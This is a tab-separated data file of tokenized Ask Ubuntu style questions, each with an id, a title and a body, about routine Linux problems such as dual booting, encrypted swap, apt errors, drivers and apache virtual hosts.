462690	what does apt-get -- fix-missing do and when is it useful ?	from the man page : -m , -- ignore-missing , -- fix-missing ignore missing packages ; if packages can not be retrieved or fail the integrity check after retrieval ( corrupted package files ) , hold back those packages and handle the result . use of this option together with -f may produce an error in some situations . if a package is selected for installation ( particularly if it is mentioned on the command line ) and it could not be downloaded then it will be silently held back . configuration item : apt : :get : :fix-missing . this is confusing : how can 'ignore missing ' and 'fix missing ' be synonyms for the same option ? what does 'hold back ' mean in this context ? what does 'handle the result ' mean ? and in what situation is it useful anyway ? when you try to install a package not in the apt index , you get this message : e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? are the two suggestions ( apt-get update , apt-get install -- fix-missing ... ) at all equivalent ?
462691	can not boot from cd drive	initially , i had windows 8 in my computer and i accidentally formatted my hard drive . i was not having windows installation disk , and hence i installed ubuntu 14.04 . now i have the windows installation disk , but i could n't boot from the cd/dvd ( official ) . when i start the computer with the cd in the tray , it directly boots to ubuntu . i have no idea how to boot from disk . i also have the ubuntu live cd , but i could n't boot that too . all i want is windows back . also , i would like to ask that would formatting hard drive would remove uefi ? ( i 'm a bit noob regarding booting ! ) . if yes , how would i get it back ? also , how do we format the whole hard drive without booting from any disk ?
462692	unable to install oracle sql developer 4.0.2 ( 4.0.2.15.21 ) from rpm file	i recently upgraded to ubuntu 14.04 ( using update manager ) , and it works fine with no issues . in which i am using sql developer 3.2.20.09 and it works fine . now a newer version was released on may 5th 2014 , and i would like to use it , as it works fine with jdk 1.7 . i followed the installation instructions provided by oracle , but it fails to install . downloaded sqldeveloper-4.0.2.15.21-1.noarch.rpm from http : //www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html followed installation instructions from http : //www.oracle.com/technetwork/developer-tools/sql-developer/downloads/sqldev-install-linux-1969676.html using the command : rpm -uhv sqldeveloper-4.0.2.15.21-1.noarch.rpm which resulted in : rpm : rpm should not be used directly install rpm packages , use alien instead ! rpm : however assuming you know what you are doing ... error : failed dependencies : /bin/sh is needed by sqldeveloper-4.0.1.14.48-1.noarch used alien to install the rpm package : sudo alien sqldeveloper-4.0.1.14.48-1.noarch.rpm which resulted in this error : error : db5 error ( -30969 ) from dbenv- > open : bdb0091 db_version_mismatch : database environment version mismatch error : can not open packages index using db5 - ( -30969 ) error : can not open packages database in /home/arthanarisamy/.rpmdb should any package be updated manually , or have i missed updating while upgrading to ubuntu 14.04 ?
462693	dpkg : error : failed to open package info file `/var/lib/dpkg/available ' for reading	i get the following error after installing nmap : dpkg : error : failed to open package info file `/var/lib/dpkg/available ' for reading : no such file or directory e : sub-process /usr/bin/dpkg returned an error code ( 2 )
462694	ca n't dual boot ubuntu with windows 8.1	i know this is n't the first time anyone has asked this question , i have looked around but that did n't solve my problem . i recently purchased toshiba c-50a , with preinstalled windows 8.1 . when i enable uefi mode in setup , it boots directly into windows and i ca n't boot my usb ubuntu installation . if however i change from uefi to cms , i boot into ubuntu and install it ( without it recognizing windows 8.1 ) , but in the grub 2 menu option it does n't display windows at all . i tried boot-repair , but it says `` you are in legacy mode , change to uefi '' . if i change to uefi , i boot directly to windows . i still continued using boot-repair , but it ended with error and corrupted grub2 . i am currently trying to repair it in live disc . any solutions would be appreciated . this is the error message after boot-repair : an error occurred during the repair . a new file ( ~/boot-info_2014-05-08__04h40.txt ) will open in your text viewer . in case you still experience boot problem , indicate its content to : boot.repair @ gmail.com you can now reboot your computer . you may want to retry after deactivating the [ backup and rename windows efi files ] option . the boot of your pc is in legacy mode . you may want to retry after changing it to efi mode . i clicked retry after changing the encoding in the text file , still no use . here are the contents of the text file that opened : http : //pastebin.com/bvwrnp3t
462696	make xubuntu 13.10 look like mac osx	i am trying to make my xubuntu saucy look like mac osx . can anyone help me out ?
462702	chhdsk and ubuntu	i have a laptop with windows and ubuntu . there were some bad sectors in a partition used by both ubuntu and windows . i have run chkdsk ( from windows installation disk ) , and so windows will not access these bad sectors anymore . however , will ubuntu try to read/write to these sectors causing further errors ?
462704	connecting bsnl data card in ubuntu 12.04.4	i have installed the bsnl 3g modem sotware in ubuntu 12.04.4 64 bit , the same has been displayed in the dash , but while cliking on the icon the program not getting invoked , no message also . any idea how to run this .
462712	concurrent multipath transfer over sctp	i 'm trying to run concurrent multipath transfer over sctp . i have two machines running ubuntu server 10.04 lts , and they have lksctp-tools 1.0.11+dfsg-1 installed does this version support cmt ? if yes what is the flag in setsockopt function
462714	restoring permissions to playonlinux	before installing 14.04 i backed up my home folder to an external ntfs hard disk . when i copied everything back i lost the correct file permissions and playonlinux programs stopped working . what permissions should i give to what files to get them working again without reinstalling ?
462715	it is possible to copy home folder to ntfs and keep permissions ?	i use grsync to copy my home folder to an external drive . this however does n't keep permissions of the files . is there a way to copy home folder to an ntfs partition ( to be readable and editable on windows ) without losing file permissions ?
462717	vpn problem in ubuntu	i am ubuntu user since 12.04 now i am using 14.04 there is a problem with my pptp vpn connection since i am using ubuntu , in my university i have to use vpn in order to connect to the internet but when i connect to vpn in ubuntu i can use internet for about 30 seconds then i can not open webpages or my download speed gets to 0 but at the same time in windows i can connect and download or view webpages easily with no problem i need your help cause i am doing most of my works with ubuntu thanks
462719	sharing folders between more than two computer	i have 4 computer which ubbuntu 13.10 installed on all of them . i need to make a share folder between all to add and remove and change the contents synchronously via the internet . so please tell me how can i do that . i am new in networking issues in ubuntu . bests
462722	how to upgrade php in ubuntu 14.04 ?	my current version is php5.4 , i want to upgrade from 5.4 to 5.5 . i'am a new to linux so ubuntu .
462725	user account not working	i created a user account `` family '' . i can see it on the login screen and in the user control setup once in ubuntu . i have tried settings : no password , password , disabling , and enabling the account . when i try to go into the family account , the screen flashes several times like it is trying to go into it and then returns to the login screen . i went into terminal and typed users . it lists my admin account but not family . when i tried to delete the family account using the sudo commands it does n't find the family account . what can i do to either get rid of and start the family account over or fix this problem ? thank you very much for you assistance .
462727	how to get info about ubuntu 14.04 specific apache2	i need settings information about apache2 in ubuntu 14.04 lts . original apache website does n't contain it of course . my installation looks completly else as original . i have to learn to advanced set-up . thanks in advance for answers , mad
462728	no install alongside windows option while installing ubuntu on triple boot	i am dual booting with windows 8 and windows 7 and i want to triple boot in third partition with ubuntu but i can not find install alongside windows option . please help !
462730	ubuntu 14.04 dualbox windows 7	i had windows 7 installed . then i install ubuntu 14.04 ( separated partition ) . but i cant have the liste of availbale os in the hdd , so the pc start win7 ! any solution pliz ?
462731	are you a root ?	if i want to install a program by : sudo apt-get install package_name i always get the error : e : could not open lock file /var/lib/apt/lists/lock - open ( 2 no such file or directory ) e : unable to lock the administration directory ( /var/lib/dpkg ) , are you root ? i am root , but still get the error . any idea ?
462739	14.04 with fde and swap is missing	helo i have a fresh install of 14.04 on a laptop with an ssd hard drive . when installing i turned on full disk encryption as well as encryption of home folder . partitioning was left to the installer with no changes made by me . would anyone know why my swap is not getting turned on , and how to fix it ? my fstab /dev/mapper/ubuntu -- vg-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=54b1c8ac-4c47-4d8a-a748-e15b1d6eb2ba /boot ext2 defaults 0 2 /dev/mapper/ubuntu -- vg-swap_1 none swap sw 0 0 /dev/sr0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 my crypttab sda5_crypt uuid=59a0e1c9-2517-4434-b9bd-c3633047190d none luks , discard cryptswap1 uuid=171441f7-054f-423a-ad8b-eba623bf67c9 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 swapon -s reports : filename type size used priority free reports : total used free shared buffers cached mem : 3740660 3463264 277396 310880 37924 1643064 -/+ buffers/cache : 1782276 1958384 swap : 0 0 0 if i try to enable swap i get sudo swapon -a swapon : /dev/mapper/ubuntu -- vg-swap_1 : read swap header failed : invalid argument swapon : /dev/mapper/cryptswap1 : stat failed : no such file or directory fdisk reports sudo fdisk -l disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000965cc device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 500117503 249807873 5 extended /dev/sda5 501760 500117503 249807872 83 linux disk /dev/mapper/sda5_crypt : 255.8 gb , 255801163776 bytes 255 heads , 63 sectors/track , 31099 cylinders , total 499611648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/sda5_crypt does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-root : 251.8 gb , 251821817856 bytes 255 heads , 63 sectors/track , 30615 cylinders , total 491839488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-root does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-swap_1 : 3976 mb , 3976200192 bytes 255 heads , 63 sectors/track , 483 cylinders , total 7766016 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-swap_1 does n't contain a valid partition table blkid reports /dev/sda1 : uuid= '' 54b1c8ac-4c47-4d8a-a748-e15b1d6eb2ba '' type= '' ext2 '' /dev/sda5 : uuid= '' 59a0e1c9-2517-4434-b9bd-c3633047190d '' type= '' crypto_luks '' /dev/mapper/sda5_crypt : uuid= '' nbhing-ylk8-kgxn-ftxp-gynd-yhcj-zbj3qd '' type= '' lvm2_member '' /dev/mapper/ubuntu -- vg-root : uuid= '' 93d6000b-74cb-47a6-9535-9f5a49c95c0e '' type= '' ext4 ''
462740	installing fglrx driver always fails	i have downloaded ubuntu 14.04 and wanted to try some opengl programming . my laptop has switchable graphics technology ( intel hd graphics 4000 and amd radeon hd 8570m ) . i thought that it 'd be better to install proprietary drivers and take advantage of opengl 4+ so first i installed the drivers by typing sudo apt-get install fglrx-updates , then i rebooted my pc . however , after boot , low-graphics error came up instead of login screen . i did n't give up and tried searching google on my other computer . i tried almost everything possible , yet it still looks like my graphics is not being recognized . it 's worth noting that i have linux-headers installed and am using 64bit version of ubuntu . also , when i uninstall the fglrx driver , everything works fine again . here 's what i already tried : reinstalling the drivers ( complete purge ) . entering low-graphics mode and typing 'amdconfig -- initial ' . installing the newest drivers drivers from amd.com ( i also tried beta drivers ; no luck ) . i switched lightdm to gdm , still no luck ( it completely broke my ubuntu installation ) . thank you for any suggestion . edit : by reading some log files i came to a conclusion that the greeter fails to start . i just do n't know why . edit 2 : i installed gdm once again . now it boots to console without showing any error . i tried to log in and type startx and it says `` caught signal 11 ( segmentation failed ) . ''
462743	how to add percent and remained time of download by aria2c via sysmonitor indicator ?	is it possible to add download progress bar aria2c/wget to panel , especially the percent and remained time of download by this appindicator or sth else ? ! i mean when you run aria2c to download a file in a terminal emulator such as gnome-terminal ( and then minimize it ) , the progress of download be in front of your eyes in top panel : )
462744	what is a good workflow to develop/test/release packages via apt repositories ?	we are currently looking for a workflow to manage ubuntu packages and releases within apt repositories . until now our small team did the development in git . one occasionally used the master branch to create builds that are then packaged manually ( into ubuntu .deb ) via dpkg-buildpackage and deployed by single apt repository . what we would like to have instead are separate repositories , i.e . an `` unstable '' repository used for development only , a `` testing '' repository and finally a `` stable '' repository . obviously , customers should get updates from the `` stable '' repository only . ideally packages are moved from `` unstable '' to `` testing '' to `` stable '' in our development cycle without requiring that packages need to be rebuilt or re-packaged . we are targeting ubuntu but need build and deploy packages suited for several ubuntu like 'precise ' or 'trusty ' . this raises a few questions : how to manage the version numbers to keep the update path straight-forward ? to us it is important that version numbers are correct in the sense that a higher version number actually means `` newer than '' . however , during development one may need to create many packages from different sources that are deployed via the `` unstable '' repository . for each new package the apt-get update should install the newest package . simply increasing the version number would mean that every developer in our team must be aware of the current version number . worse , the version must be consistent across multiple git feature branches which seems difficult to me . do we need additional repositories , i.e . one per developer to avoid version number conflicts during testing ? do we need constructs like appending `` ppa '' suffixes to the version number ? or is there a different approach ?
462745	unable to boot ubuntu 12.04 even after repairing grub with boot repair	i have a dell inspiron pre-installed with ubuntu 12.04 , i installed windows 8 and then used boot repair from ubuntu 12.04 live usb to repair grub . but system is directly booting to windows 8. url i got is http : //paste.ubuntu.com/7414543 . please help , thanks in advance .
462747	lubuntu no battery status	i just installed lubuntu and could n't figure out how to show the battery status in the system bar . i think my xfce power management is missing `` on battery '' option ( see screenshot ) . does anyone know how to resolve this ? ?
462753	can i install in unallocated partition and use bios to boot ?	i am trying to install ubuntu on a windows 7 64bit laptop . the installer did n't recognise windows . the partitions , according to windows disk management are 1 ) 100mb ntfs system , active , primary partition 2 ) ( c : ) 220 gb boot , page file , crash dump , primary partition 3 ) 220.66 gb unallocated 4 ) 25 gb recovery partition . could i install ubuntu in the unallocated partition - i think it was called free space in the installer - and then just use the bios to boot - at the moment i want to carry on using windows most of the time , while i learn how to use linux . andrew p.s . i got this boot-info report : http : //paste.ubuntu.com/7409913/
462756	error in juju configurations	i have configured ubuntu 14.04 lts 1 vm for maas-cluster , 2 vm for nodes to connect the maas-cluster . i am not able to complete juju configuration in nodes , find the below error . error details : can not parse `` /root/.juju/environments.yaml '' : yaml error : line 326 : could not find expected ' : ' what should i do to solve this problem ?
462759	macbook air - with ubuntu 14.04 64-bit wireless card is not recognized , mouse pad do not work properly	bought brand new macbook air and then installed ubuntu 14.04 64-bit successfully but major hardwares are not compatible such as wifi card and mouse pad is not working smoothly like in osx it does . how to fix the wifi cause i have no other network interface on this macbook air . optiona : here is how i installed : step 1 : on mac osx 10.9.2 open disk utility i resize 80gb for mac and 40gb as unallocated step 2 : optional : refind-bin-0.8.0.zip , basically its a gui bootable screen if i do not install it there is no big deal cause ubuntu has itself tui grub menu . was confused so installed it anyway . $ ls copying.txt license.txt readme.txt docs install.sh mkrlconf.sh refind credits.txt news.txt banners fonts keys mvrefind.sh $ ./install.sh not running as root ; attempting to elevate privileges via sudo ... . password : installing refind on os x ... . installing refind to the partition mounted at // copied refind binary files copying sample configuration file as refind.conf ; edit this file to configure refind . warning : if you have an advanced format disk , *do not* attempt to check the bless status with 'bless -- info ' , since this is known to cause disk corruption on some systems ! ! installation has completed successfully . step 3 : download ubuntu 14.04 64-bit iso for bootable usb stick $ hdiutil convert -format udrw -o ubuntu-14.04-desktop-amd64.img ubuntu-14.04-desktop-amd64.iso reading driver descriptor map ( ddm : 0 ) … reading ubuntu 14.04 lts amd64 ( apple_iso : 1 ) … reading apple ( apple_partition_map : 2 ) … reading ubuntu 14.04 lts amd64 ( apple_iso : 3 ) … ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... reading efi ( apple_hfs : 4 ) … ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . reading ubuntu 14.04 lts amd64 ( apple_iso : 5 ) … ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . elapsed time : 8.123s speed : 118.7mbytes/sec savings : 0.0 % created : /users/sun/downloads/ubuntu-14.04-desktop-amd64.img.dmg $ diskutil list /dev/disk0 # : type name size identifier 0 : guid_partition_scheme *121.3 gb disk0 1 : efi efi 209.7 mb disk0s1 2 : apple_hfs macintosh hd 80.0 gb disk0s2 3 : apple_boot recovery hd 650.0 mb disk0s4 /dev/disk1 # : type name size identifier 0 : fdisk_partition_scheme *120.0 gb disk1 1 : windows_fat_32 uui 120.0 gb disk1s1 $ diskutil unmountdisk /dev/disk1 unmount of all volumes on disk1 was successful $ sudo dd if=ubuntu-14.04-desktop-amd64.img.dmg of=/dev/rdisk1 bs=1m password : 964+0 records in 964+0 records out 1010827264 bytes transferred in 24.643578 secs ( 41017877 bytes/sec ) note : wired popup came out , press ignore $ diskutil eject /dev/disk1 disk /dev/disk1 ejected step 4 : reboot and boot with usb stick , do the partition where i selected `` something else '' to make the ubuntu partition and completed the ubuntu setup , by selecting the efi after booting to ubuntu cant make wifi working and there is no other way to go to internet , switched back to mac osx
462760	static arp blocked all devices	i tried to configure static arp on some interface , but when i do this the server blocked any connections from my pcs which are in the server 's arp table . i have a script which runs at startup : ... ... ifconfig em1 -arp ; ifconfig -f $ pathtofile ; # file containts pair : ip mac ... ... the command arp -n shows all entries in my ip-mac pair file . so , all entries are added , but it blocks any connections . when i type ifconfig em1 arp all works fine . what have i done wrong ?
462763	could not ping solaris kvm guest from another computer	i setup solaris guest using kvm in ubuntu . i do n't have problem pinging host ( ubuntu ) to guest ( solaris ) and vice versa . also my solaris guest can ping other computers in my network but not the other way around . below is the network configuration i have : host ifconfig br0 link encap : ethernet hwaddr b8 : ac:6f:24:6b : e5 inet addr:192.168.23.133 bcast:192.168.23.255 mask:255.255.255.0 inet6 addr : fe80 : :baac:6fff : fe24:6be5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:61723 errors:0 dropped:0 overruns:0 frame:0 tx packets:662 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5869388 ( 5.8 mb ) tx bytes:83437 ( 83.4 kb ) eth0 link encap : ethernet hwaddr b8 : ac:6f:24:6b : e5 up broadcast running multicast mtu:1500 metric:1 rx packets:64919 errors:0 dropped:0 overruns:0 frame:0 tx packets:1032 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7268230 ( 7.2 mb ) tx bytes:141407 ( 141.4 kb ) interrupt:21 memory : fe6e0000-fe700000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:11874 errors:0 dropped:0 overruns:0 frame:0 tx packets:11874 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2883265 ( 2.8 mb ) tx bytes:2883265 ( 2.8 mb ) virbr0 link encap : ethernet hwaddr 06:55:66 : b4 : cc:68 inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) vnet0 link encap : ethernet hwaddr fe:54:00:67 : d6 : ca inet6 addr : fe80 : :fc54 : ff : fe67 : d6ca/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:83 errors:0 dropped:0 overruns:0 frame:0 tx packets:54663 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:13254 ( 13.2 kb ) tx bytes:5919041 ( 5.9 mb ) and this is for host /etc/network/interfaces # loopback auto lo iface lo inet loopback # eth0 interface auto eth0 iface eth0 inet manual # virtual bridge auto br0 iface br0 inet dhcp bridge_ports eth0 bridge_stp off bridge_fd 0 bridge_maxwait 0 i have read these sites link1 and link2 but still after numerous configuration changes including adding br0 on /etc/network/interfaces , i still ca n't ping my solaris guest from another computer . can anyone give me advice on this ? thanks in advance . update after tinkering with various configuration i was able to ping solaris vm from another computer , host ( ubuntu ) to guest ( solaris ) vice versa . the configuration above is a working configuration . i hope this is helpful for others who encountered the same problem .
462769	remove audio from mp4 file	i have a video file i.e . video.mp4 it contain both video and audio . i want to remove the audio from this mp4 file . i tried using the following ffmpeg command : ffmpeg -i /home/desktop/video.mp4 -vcodec copy -an output_file.mp4 but i am getting assertion next_dts > = 0 failed error : following is the o/p with error of above command : input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from '/home/dipti/desktop/video.mp4 ' : metadata : major_brand : qt minor_version : 537199360 compatible_brands : qt creation_time : 2006-12-19 23:06:53 encoder : sorenson squeeze encoder-eng : sorenson squeeze duration : 00:05:12.11 , start : 0.000000 , bitrate : 194 kb/s stream # 0:0 ( eng ) : video : svq3 ( svq3 / 0x33515653 ) , yuvj420p , 880x660 , 129 kb/s , 5 fps , 5 tbr , 600 tbn , 600 tbc ( default ) metadata : creation_time : 2006-12-19 23:06:53 handler_name : apple alias data handler stream # 0:1 ( eng ) : audio : mp3 ( ms [ 0 ] u / 0x5500736d ) , 44100 hz , mono , s16p , 64 kb/s ( default ) metadata : creation_time : 2006-12-19 23:06:53 handler_name : apple alias data handler stream # 0:2 ( eng ) : video : png ( png / 0x20676e70 ) , rgba , 880x660 [ sar 2835:2835 dar 4:3 ] , 920 kb/s , 15 fps , 15 tbr , 600 tbn , 600 tbc ( default ) metadata : creation_time : 2006-12-19 23:06:53 handler_name : apple alias data handler output # 0 , mov , to 'output_file.mov ' : metadata : major_brand : qt minor_version : 537199360 compatible_brands : qt encoder-eng : sorenson squeeze encoder : lavf55.34.100 stream # 0:0 ( eng ) : video : svq3 ( svq3 / 0x33515653 ) , yuvj420p , 880x660 , q=2-31 , 129 kb/s , 5 fps , 19200 tbn , 600 tbc ( default ) metadata : creation_time : 2006-12-19 23:06:53 handler_name : apple alias data handler stream mapping : stream # 0:0 - > # 0:0 ( copy ) press [ q ] to stop , [ ? ] for help assertion next_dts > = 0 failed at libavformat/movenc.c:620 aborted ( core dumped ) so how can i remove the audio from the video file . thanks in advance .
462772	how to restrict account access temporarily ubuntu	i need to temporarily lock accounts for couple of users on my ubuntu server . what would be the best way to do this ? reason for doing this is a maintenance . however for some users the accounts need to be opened the whole time . so my question is how to lock out some users so they can not ssh into their accounts without messing with their passwords . best b
462773	strange output of btrfs fi df after converting from raid0 to raid1	i just converted my 3 disk btrfs filesystem from raid0 to raid1 and balanced it . at first the data was all in the raid0 filesystem , so running btrfs filesystem df showed something like this : ( xx are because i do n't remember the exact sizes ) data , raid1 : total=4.00gb , used=4.00gb data , raid0 : total=2.xxtb , used=2.xxtb system , raid1 : total=8.00mb , used=340.00kb system : total=4.00mb , used=0.00 metadata , raid1 : total=5.00gb , used=2.54gb the data was transfered between filesystems . so it seemed everything was working perfectly . however the balance operation finished and i am left with this : data , raid1 : total=2.35tb , used=2.32tb data , raid0 : total=2.00gb , used=2.00gb system , raid1 : total=8.00mb , used=340.00kb system : total=4.00mb , used=0.00 metadata , raid1 : total=5.00gb , used=2.54gb i do n't know why i still have 2 gb in a raid0 configuration . how can i get rid of it ? i have tried rebooting in case some further cleaunp was needed , but to no avail . any tips i can try ? also can anybody explain why i have two system entries ? i have tried running btrfs balance status /storage and there is no balance operation still in process . i am running a full btrfs balance start -dconvert=raid1 -mconvert=raid1 /status again and will see if this fixes it .
462774	disabled keyboard shortcuts are activated again after logout	in ubuntu 14.04 disabled keyboard shortcuts that i set in the system settings gui seem to not get persisted , since they are active again with each new session . can i disable them manually in some config file ?
462775	swap not working on clean 14.04 install using encrypted home	update 3 : i decided to reinstall the system from scratch to remove any old cruft lying around since i had been experiencing some other issues after the upgrade aswell . howver , this issue persisted . on a clean install , choosing to install using `` encrypted home '' leads to a broken encrypted swap configuration . update 2 : i fixed the partioning order that cfdisk complained about , but he issue persists . the swap is now on /dev/sda6 , and i can get it up and running as follows : ~ $ sudo mkswap /dev/sda6 setting up swapspace version 1 , size = 7998460 kib no label , uuid=18881d0f-d9ec-43be-a23f-0cbd78ea6d22 $ sudo nano /etc/crypttab # update crypttad with new uuid $ sudo /etc/init.d/cryptdisks reload * stopping remaining crypto disks ... * cryptswap1 ( stopped ) ... [ ok ] * starting remaining crypto disks ... * cryptswap1 ( starting ) .. * cryptswap1 ( started ) ... [ ok ] $ sudo swapon -a $ ls -l /dev/disk/by-uuid/ total 0 lrwxrwxrwx 1 root root 10 may 11 09:04 08b07f88-6da5-4b40-b062-42b3bb1c5f00 - > ../../sda3 lrwxrwxrwx 1 root root 10 may 11 09:08 18881d0f-d9ec-43be-a23f-0cbd78ea6d22 - > ../../sda6 lrwxrwxrwx 1 root root 10 may 11 09:04 19aa372c-05c8-4226-8f09-c54e5566e816 - > ../../sda5 lrwxrwxrwx 1 root root 10 may 11 09:04 a800b16e00b143da - > ../../sda1 lrwxrwxrwx 1 root root 10 may 11 09:04 d28230e68230d129 - > ../../sda2 lrwxrwxrwx 1 root root 10 may 11 09:08 fcc8c419-8fec-4d4d-b55e-9e4c3b04d21d - > ../../dm-0 but after a reboot swap fails to activate and it once again looks like this : $ ls -l /dev/disk/by-uuid/ total 0 lrwxrwxrwx 1 root root 10 may 11 09:12 08b07f88-6da5-4b40-b062-42b3bb1c5f00 - > ../../sda3 lrwxrwxrwx 1 root root 10 may 11 09:12 19aa372c-05c8-4226-8f09-c54e5566e816 - > ../../sda5 lrwxrwxrwx 1 root root 10 may 11 09:12 a800b16e00b143da - > ../../sda1 lrwxrwxrwx 1 root root 10 may 11 09:12 d28230e68230d129 - > ../../sda2 my guess at the moment is that when setting up the disk as being encrypted linux no longer recognizes the partition type and therefore does n't load it properly causing it to not register for it 's uuid and therefore cryptswap ca n't find it causing the failure . but i do n't know how to fix it.. updated question : further testing revealed that i could get the swap up and running by running $ mkswap /dev/sda5 and then updating /etc/crypttab with the correct uuid and following the steps outlined here : how do i setup an encrypted swap file ? the problem however remains when i reboot the computer , the /dev/sda5 does n't appear when i run $ ls -l /dev/disk/by-uuid/ if i do : $ cfdisk /dev/sda i get the following error : fatal error : bad logical partition 6 : enlarged logical partitions overlap press any key to exit cfdisk the graphical `` disks '' utility does n't complain about any error when opening the disk using it . $ sudo fdisk -l disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x619aebf1 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 100870143 50331648 7 hpfs/ntfs/exfat /dev/sda3 191397888 192397311 499712 83 linux /dev/sda4 192399358 500117503 153859073 5 extended /dev/sda5 484118528 500117503 7999488 82 linux swap / solaris /dev/sda6 192399360 484118527 145859584 83 linux partition table entries are not in disk order original question : after upgrading to 14.04 ( from 13.04 ) my computer has been experiencing severe slowdowns , when running top i noticed kswap0 taking up alot of cpu time . i also noticed that i did n't have any swap space ! $ sudo swapon -a swapon : /dev/mapper/cryptswap1 : stat failed : no such file or directory there seems to be some problem with my encrypted swap setup ( did n't even know that i had one ) $ cat /etc/crypttab cryptswap1 uuid=abe3c568-c8fd-4dfb-b8e9-0520d442dd61 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 $ ls -l /dev/disk/by-uuid/ total 0 lrwxrwxrwx 1 root root 10 may 6 11:00 08b07f88-6da5-4b40-b062-42b3bb1c5f00 - > ../../sda3 lrwxrwxrwx 1 root root 10 may 6 11:00 19aa372c-05c8-4226-8f09-c54e5566e816 - > ../../sda6 lrwxrwxrwx 1 root root 10 may 6 11:00 a800b16e00b143da - > ../../sda1 lrwxrwxrwx 1 root root 10 may 6 11:00 d28230e68230d129 - > ../../sda2 and looking at my fstab $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda6 during installation uuid=19aa372c-05c8-4226-8f09-c54e5566e816 / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda3 during installation uuid=08b07f88-6da5-4b40-b062-42b3bb1c5f00 /boot ext2 defaults 0 2 # swap was on /dev/sda5 during installation # uuid=abe3c568-c8fd-4dfb-b8e9-0520d442dd61 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 my guess is that there is something wrong the the setup of sda5 , but i do n't know how to fix it since it is setup up to be encrypted . would appreciate some help as how to proceed .
462778	problem when upgrading to ubuntu 14.04 from ubuntu 12.04	when upgrading to ubuntu 14.04 from ubuntu 12.04 i am getting the following error : w : failed to fetch http : //deb.opera.com/opera-beta/dists/stable/release unable to find expected entry 'non-free/source/sources ' in release file ( wrong sources.list entry or malformed file ) , e : some index files failed to download . they have been ignored , or old ones used instead .
462779	windows 8 not recognised when installing ubuntu 14.04	blockquote this question already has an answer here : how do i install ubuntu beside windows 7 using âsomething elseâ ? 3 answers i recently got a laptop that came pre-installed with windows 8 . i would also like to run linux , but i do not want to remove windows , as many of the programs i use for school are only windows-compatible . i successfully booted using a usb into 'try ubuntu ' , but when i went to install the only options were to overwrite windows or 'something else ' - it said no other operating system was detected . i did some research into partitioning , but the guides all said to back up a windows image ( or something like that ) in case something went wrong . however , i do n't have any way of backing up ( all my usb sticks are < 4gb ) . so i have a few questions : how do i solve the issue with windows 8 not being recognised ? using the built-in ubuntu 'install alongside ' would be so much easier than partitioning myself ( i really do n't want to mess anything up )
462780	help with name-based virtual host	need help with name-based server setup using apache2 . what i want to accomplish is a url like this custom_name2.custom_name1.domain.com . i already made custom_name2.custom_name2.domain.com.conf file eg . < virtualhost *:80 > servername custom_name2.custom_name1.domain.com documentroot / [ root folder ] /somefolder < /virtualhost > and configured my hosts file [ xxx.xx.xx.xx custom_name2.custom_name1.domain.com ] but still does not work . this however does work [ xxx.xx.xx.xx custom_name1.domain.com ] . any help will be very much appreciated .
